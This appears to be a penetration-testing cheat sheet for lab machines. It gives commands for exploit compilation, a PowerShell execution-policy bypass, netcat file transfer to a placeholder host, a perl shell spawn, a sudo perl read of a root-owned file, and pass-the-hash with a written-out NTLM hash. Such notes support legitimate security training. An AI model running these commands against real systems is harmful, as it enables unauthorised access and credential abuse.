MISC
Compiling Exploits
gcc -o exploit exploit.c
#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Cross compiling
Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
Packet Inspection
tcpdump tcp port 80 -w output.pcap -i eth0
Powershell bypass
Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
Window Exploit Suggester
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
Finding Auxiliary
ls /usr/share/nmap/scripts/ | grep smb | grep vuln
Netcat
From attacker to target
At target
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
Perl Exploit
Perl Exploit
perl —e 'exec "/bin/sh";'
sudo perl -F: -lane 'print $F[0]' /root/root.txt
Awk
Remove duplicate lines:
awk '!seen[$0]++' file
Searchsploit
searchsploit --overflow --exact --mirror 21234
searchsploit --overflow --exact Gwolle
Firewall Rule Enable
firewall rule enable
ufw allow from victimip to any port 80,443 proto tcp
Wordlist Creation
Wordlist creation:
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
PASS the HASH
Pass the hash :
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
crackmapexec
pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
Share folder Windows to linux
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other
Last modified 2yr ago